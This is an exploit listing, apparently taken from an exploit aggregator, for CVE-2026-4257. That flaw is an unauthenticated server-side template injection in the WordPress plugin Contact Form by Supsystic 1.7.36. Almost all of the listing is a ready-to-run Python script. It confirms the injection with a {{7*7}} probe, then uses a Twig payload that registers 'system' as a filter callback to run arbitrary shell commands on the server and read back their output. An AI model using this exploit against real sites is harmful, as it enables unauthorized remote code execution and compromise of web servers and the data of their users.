Exploit for 📄 Contact Form by Supsystic 1.7.36 Server-Side Template Injection CVE-2026-4257

Name: Exploit for 📄 Contact Form by Supsystic 1.7.36 Server-Side Template Injection CVE-2026-4257
Rating: 5 (91 reviews)
2026-05-11 | CVSS 9.8
## https://sploitus.com/exploit?id=PACKETSTORM:220753
import requests
    import argparse
    import re
    import urllib.parse
    
    def check_ssti(url, field_name):
        print(f"[*] Testing SSTI on {url} with field {field_name}...")
        
        # Simple arithmetic test
        test_payload = "{{7*7}}"
        params = {
            "cfsPreFill": "1",
            field_name: test_payload
        }
        target_url = f"{url}?{urllib.parse.urlencode(params)}"
        
        try:
            response = requests.get(target_url, verify=False, timeout=10)
            if "49" in response.text:
                print("[+] SSTI confirmed! Found '49' in response.")
                return True
            else:
                print("[-] SSTI test failed. '49' not found in response.")
                return False
        except Exception as e:
            print(f"[-] Error: {e}")
            return False
    
    def trigger_rce(url, field_name, command):
        print(f"[*] Triggering RCE: {command}")
        
        # Payload to register system as a filter callback and then call it
        # We use forms.params.fields.1.value and fields.2.value to avoid quote escaping
        # last_name will be 'system', email will be the command
        payload = "{{_self.env.registerUndefinedFilterCallback(forms.params.fields.1.value)}}{{_self.env.getFilter(forms.params.fields.2.value)}}"
        
        params = {
            "cfsPreFill": "1",
            field_name: payload,
            "last_name": "system",
            "email": command
        }
        
        target_url = f"{url}?{urllib.parse.urlencode(params)}"
        
        try:
            response = requests.get(target_url, verify=False, timeout=10)
            print(f"[*] Response Status: {response.status_code}")
            
            # Look for common patterns in the response that might indicate success
            # The output usually appears in the 'value' attribute of the first field
            match = re.search(r'name="fields\[' + field_name + r'\]" value="([^"]+)"', response.text)
            if match:
                print(f"[!] RCE SUCCESS! Output:")
                print(f"----------------------------------------")
                print(match.group(1))
                print(f"----------------------------------------")
                return True
            else:
                print("[-] Could not find command output in response. Check the response body manually.")
                return False
        except Exception as e:
            print(f"[-] Error: {e}")
            return False
    
    if __name__ == "__main__":
        print("""
    CVE-2026-4257
    Contact Form by Supsystic <= 1.7.36 - Unauthenticated Server-Side Template Injection via Prefill Functionality
    
    -------------------------------------------------
        """)
        
        parser = argparse.ArgumentParser(description="PoC for CVE-2026-4257 (SSTI to RCE in Contact Form by Supsystic)")
        parser.add_argument("-u", "--url", required=True, help="URL of the page with the form")
        parser.add_argument("-f", "--field", required=True, help="Name of the form field (e.g., first_name)")
        parser.add_argument("-c", "--cmd", default="whoami", help="Command to execute")
        
        args = parser.parse_args()
        
        if check_ssti(args.url, args.field):
            trigger_rce(args.url, args.field, args.cmd)